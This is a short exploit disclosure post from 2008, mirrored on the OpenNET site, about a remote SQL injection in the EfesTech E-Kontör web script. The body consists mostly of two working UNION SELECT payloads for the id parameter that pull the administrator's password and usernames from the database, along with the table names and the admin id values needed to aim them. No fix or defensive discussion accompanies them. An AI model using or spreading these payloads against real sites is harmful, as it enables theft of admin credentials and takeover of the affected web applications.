The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


EfesTech E-Kontr (id) Remote SQL INJECTION


<< Previous INDEX Search src / Print Next >>
Date: 23 Mar 2008 15:25:38 -0000
From: [email protected]
To: [email protected]
Subject: EfesTech E-Kontr (id) Remote SQL INJECTION
X-Eagle-Notice: Sender not 8-bit clean in Subject: EfesTech E-Kont\366r (id) Remote SQL INJECTION
X-Virus-Scanned: antivirus-gw at tyumen.ru

############################################################## 


$Author = RMx
$home page = www.coderx.org
$thanks = Dynamic , TR_IP , Liz0zim
$Script name = Efestech E-KontЖr (tr)
$script test = http://www.aspindir.com/Goster/5145
$script sales = 750 YTL


############################################################## 
// EfesTech E-KontЖr (id) Remote SQL INJECTION

// Table names 

id no = id
password : sifre
users = firma


exploit for password = ?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
explot for usernames = ?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1

NOTe = &#304;D values 1  or 2 for admin

Bye 


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру